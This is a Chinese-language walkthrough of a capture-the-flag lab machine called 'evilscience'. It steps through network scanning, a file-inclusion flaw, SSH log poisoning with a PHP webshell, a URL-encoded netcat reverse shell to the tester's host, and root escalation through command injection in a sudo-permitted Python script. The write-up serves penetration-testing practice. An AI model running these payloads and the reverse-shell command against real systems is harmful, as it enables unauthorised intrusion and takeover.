靶机渗透（十二）evilscience

靶机evilscience

 

一、实验环境

二、实验步骤

（一）信息收集

1.查看测试机的IP信息，判断所处网段

2.主机发现（netdiscover）

3.端口扫描（masscan/nmap）

4.网站指纹信息扫描（whatweb)

（二）Web渗透

1.浏览web网页（80端口）

2.目录扫描（dirb）

3.文件包含漏洞利用

>另一种执行ls命令的方法

4.获取shell

>获取反弹shell

5.提权

---

一、实验环境

1.靶机：evilscience

2.测试机：Kali

3.帮凶机：Windows 10

二、实验步骤

（一）信息收集

1.查看测试机的IP信息，判断所处网段

2.主机发现（netdiscover）

netdiscover -i eth0 -r 192.168.10.0/24

• 发现目标主机：192.168.10.165（有两个Mac地址相同的IP，取其一即可）

3.端口扫描（masscan/nmap）

masscan --rate=10000 --ports 0-65535 192.168.10.165
nmap -sV -T4 -p 22,80 192.168.10.165

• 开启了22（ssh服务）、80（http服务）端口

4.网站指纹信息扫描（whatweb)

whatweb 192.168.10.165

（二）Web渗透

1.浏览web网页（80端口）

• 点击“about us”，发现可能存在文件包含漏洞，在该页面内发现一个邮箱（[email protected]），可能有用

2.目录扫描（dirb）

dirb http://192.168.10.165

• 除部分静态文件，没有发现可利用信息

3.文件包含漏洞利用

a.尝试包含/etc/passwd（失败)

b.扫描可包含的文件

• 发现几个可包含的文件

c.包含/var/log/auth.log

• 查看/var/log/auth.log时，重定向到了首页，可能隐藏了某些信息，抓包查看

• 发现ssh远程连接相关信息，使用任意账号远程进行测试，发现/var/log/auth.log文件中有相关的登录信息（登录的用户名）

• 可以在使用ssh远程连接时，将用户名替换为一句话木马，以攻击

d.注入一句话木马

ssh ''@192.168.10.165

• 在远程连接的用户处，注入一个getshell的php代码

e.查看最新的日志

file=/var/log/auth.log

• 用户名被隐藏

f.通过php代码执行ls命令

file=/var/log/auth.log&cmd=ls

• 在该路径下发现一个xxxlogauditorxxx.py的python脚本

>另一种执行ls命令的方法

curl -is 'http://192.168.10.165/index.php?file=/var/log/auth.log&cmd=ls'

4.获取shell

a.测试机开启监听

nc -vnlp 7777

b.执行反弹shell命令

file=/var/log/auth.log&cmd=mknod+backpipe+p+%26%26+nc+192.168.10.128+4444+0%3cbackpipe+%7c+%2fbin%2fbash+1%3ebackpipe

• 该命令需要使用url编码

>获取反弹shell

mknod backpipe p && nc 测试机IP 监听端口 0backpipe

url编码——>

mknod+backpipe+p+%26%26+nc+测试机IP+监听端口+0%3cbackpipe+%7c+%2fbin%2fbash+1%3ebackpipe

c.拿到shell

python -c 'import pty; pty.spawn("/bin/bash")'

5.提权

a.查看当前用户权限

sudo -l

• 当前用户可使用sudo权限不需要密码执行xxxlogauditorxxx.py

b.查看xxxlogauditorxxx.py文件

• 该文件前段大部分使用了base64编码

c.尝试运行该脚本

sudo ./xxxlogauditorxxx.py
/var/log/auth.log | id

• 在该python脚本中可以执行命令

• 当运行/var/log/auth.log | id命令时，可知此时为root用户

• 那么，可以通过python与/var/log/auth.log | 命令组合获取root权限

d.查看/root目录下文件

sudo ./xxxlogauditorxxx.py
/var/log/auth.log | ls /root

• 在/root目录下，找到flag.png文件

e.获取flag文件

sudo ./xxxlogauditorxxx.py
/var/log/auth.log | cp /root/flag.png /var/www/html/theEther.com/public_html/flag.png
wget http://192.168.10.165/?file=flag.png

• 将flag.png文件复制到公共目录下，在测试机使用wget命令下载flag.png文件

f.查看flag.png

display 'index.html?file=flag.png'

• 打开flag.png，没有发现有用信息

• 使用cat命令查看flag.png文件，发现一堆乱码和一部分使用base64编码的flag内容

g.获取flag

base64 -d evilflag.txt > flag.txt

• 将flag中的内容使用base64解码，获得flag